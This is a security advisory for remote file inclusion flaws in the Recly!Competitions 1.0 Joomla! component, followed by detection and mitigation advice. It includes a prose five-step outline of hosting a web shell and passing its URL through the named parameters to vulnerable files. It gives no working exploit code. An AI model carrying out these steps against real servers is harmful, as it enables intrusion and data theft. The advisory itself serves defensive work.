Source: cve@mitre.org
Multiple PHP remote file inclusion vulnerabilities in the Recly!Competitions (com_competitions) component 1.0 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) add.php and (b) competitions.php in includes/competitions/, and the (2) mosConfig_absolute_path parameter to (c) includes/settings/settings.php.
Recly!Competitions (com_competitions) component 1.0 for Joomla! is vulnerable to multiple remote file inclusion (RFI) vulnerabilities. Attackers can leverage these flaws to execute arbitrary PHP code on the server, potentially leading to complete system compromise and data exfiltration.
Step 1: Payload Preparation: The attacker prepares a malicious PHP script (e.g., a web shell) hosted on a server they control. This script will be used to gain remote code execution.
Step 2: Crafting the Exploit URL: The attacker constructs a URL that exploits the RFI vulnerability. This URL targets one of the vulnerable files (e.g., add.php, competitions.php, or settings.php). The URL includes the GLOBALS[mosConfig_absolute_path] or mosConfig_absolute_path parameter, set to the URL of the attacker's malicious PHP script.
Step 3: Exploit Delivery: The attacker sends the crafted URL to the vulnerable Joomla! website, typically by directly accessing it through a web browser or using a tool like curl.
Step 4: Code Execution: The vulnerable PHP script, upon receiving the malicious URL, uses the include or require function to fetch and execute the attacker's PHP script from the attacker's server.
Step 5: System Compromise: The attacker's PHP script executes on the server, granting the attacker remote code execution (RCE) capabilities. This allows the attacker to upload files, execute commands, access sensitive data, and potentially take full control of the server.
The vulnerability stems from insufficient input validation and sanitization within the Recly!Competitions component. Specifically, the component fails to properly validate the GLOBALS[mosConfig_absolute_path] and mosConfig_absolute_path parameters before including files. This allows an attacker to inject a malicious URL pointing to a PHP script hosted on a remote server. The PHP interpreter then executes the attacker-controlled code, granting the attacker control over the server. The root cause is the direct use of user-controlled input in include or require statements without proper sanitization, leading to the RFI condition. This is a classic example of a security misconfiguration.
This vulnerability is a common attack vector and could be exploited by various threat actors, including script kiddies and more sophisticated groups. It's often used as an initial access point. CISA KEV: Not listed.
Web server access logs: Look for suspicious HTTP requests containing URLs with the GLOBALS[mosConfig_absolute_path] or mosConfig_absolute_path parameters, especially if the values point to external domains or unusual file extensions.
Web application firewall (WAF) logs: WAFs can detect and block RFI attempts by identifying malicious patterns in HTTP requests. Review WAF logs for blocked requests related to this vulnerability.
File integrity monitoring (FIM): Monitor critical system files for unauthorized modifications, especially those related to the Joomla! installation and the Recly!Competitions component.
Network traffic analysis: Analyze network traffic for unusual outbound connections from the web server, which could indicate the attacker is exfiltrating data or establishing a command-and-control (C2) channel.
Intrusion detection system (IDS) alerts: IDS systems can be configured to detect known RFI attack signatures.
Review PHP error logs: Look for errors related to file inclusion, especially those involving external URLs.
Upgrade: Update the Recly!Competitions component to a patched version or remove it entirely if not needed. Since the component is old, removal is likely the best option.
Input validation: Implement robust input validation and sanitization to ensure that the GLOBALS[mosConfig_absolute_path] and mosConfig_absolute_path parameters only accept expected values and formats. Specifically, ensure these parameters are not used directly in include or require statements.
Disable remote file inclusion: Configure the PHP php.ini file to disable remote file inclusion by setting allow_url_include = Off. This is a critical step.
Web application firewall (WAF): Deploy a WAF to filter malicious traffic and block RFI attempts.
File permissions: Ensure that web server files have appropriate permissions to prevent unauthorized access and modification.
Regular security audits: Conduct regular security audits and penetration testing to identify and address vulnerabilities.
Keep Joomla! and all installed components up-to-date with the latest security patches.